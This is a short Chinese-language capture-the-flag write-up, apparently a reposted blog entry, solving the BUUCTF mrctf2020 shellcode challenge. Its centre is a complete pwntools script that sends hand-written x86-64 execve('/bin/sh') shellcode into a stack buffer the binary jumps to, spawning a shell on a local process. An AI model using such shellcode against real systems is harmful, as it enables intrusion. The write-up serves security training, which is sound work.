BUUCTF–mrctf2020
这是一题64位的shellocde题,没啥花招入门题。看下保护:
有可执行的段。接着我们看看IDA:
主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。
正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')
shellcode = '''
mov rbx,0x68732f6e69622f
push rbx
push rsp
pop rdi
xor esi,esi
xor edx,edx
push 0x3b
pop rax
syscall
'''
shellcode=asm(shellcode)
io.recvuntil("magic!")
io.sendline(shellcode)
io.interactive()
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://net2asp.com/179d71848b.html
相关推荐
-
Leetcode刷题之环形链表
莫等闲,白了少年头,空悲切。 –岳飞 目录 1.环形链表 2.环形链表Ⅱ 1.环形…
-
如何用C语言计算算法的执行时间?
如何用C语言计算算法的执行时间? 1. 使用C语言标准库函数`clock()` 2. 使用`time.h`头文件中的`time()`函数 3. 使用`gettimeofday()`…
-
Redis设置hash,为不同的field设置不同的过期时间
Redis设置hash,为不同的field设置不同的过期时间 一、背景需求 二、具体要求 三、代码实现 一、背景需求 最近做了一个小需求,由于系统对接,导致我们的系统在高峰的时候C…
-
计算机体系结构—-计分板(scoreboard)算法
计分板算法简介 计分板记录着所有必要的信息,用来控制以下事情: 每条指令何时可以读取操作数并投入运行(对应着RAW冲突的检测) 每条指令何时可以写入结果(对应着WAR冲突的检测) …
-
IS-IS:03 ISIS链路状态数据库
一个 OSPF 链路状态数据库是若干条 LSA 的集合。与此相似,一个 IS-IS 链路状态数据库是若干条 LSP 的集合。与 OSPF 链路状态数据库不同, IS-IS 链路…
-
如何把word檔案自動化
1.安裝 pip install jojo-office ( 安裝這個) 2.讀取表格內容與文章內容,範例如下 import office from docx import Doc…
-
IS-IS:04 DIS
IS-IS 协议只支持两种网络类型,即广播网络和点到点网络。与 OSPF 协议相同, IS-IS 协议在广播网络中会将网络视为一个伪节点 ( Pesudonde,简称 PSN)…
-
R语言【taxlist】——subset():取taxlist对象的子集
Package taxlist version 0.2.4 Description taxlist对象的子集将通过逻辑操作或模式匹配来完成。子集可以引用包含在插槽taxonName…
-
元旦特辑:Note6—选择排序
目录 前言❌ 1. 基本思想⚠️ 2. 直接选择排序🟢 2.1 思路分析✳️ 2.2 代码实现❎ 2.2.1 sort.h 2.2.2 sort.c 2.2.3 t…
-
短视频与小程序:如何实现完美结合?
在短视频日益成为人们娱乐、社交和信息获取的重要渠道的今天,如何在短视频平台进行小程序推广成为了许多企业和品牌关注的焦点。本文将介绍如何利用短视频平台进行小程序推广,提升品牌曝光和用…
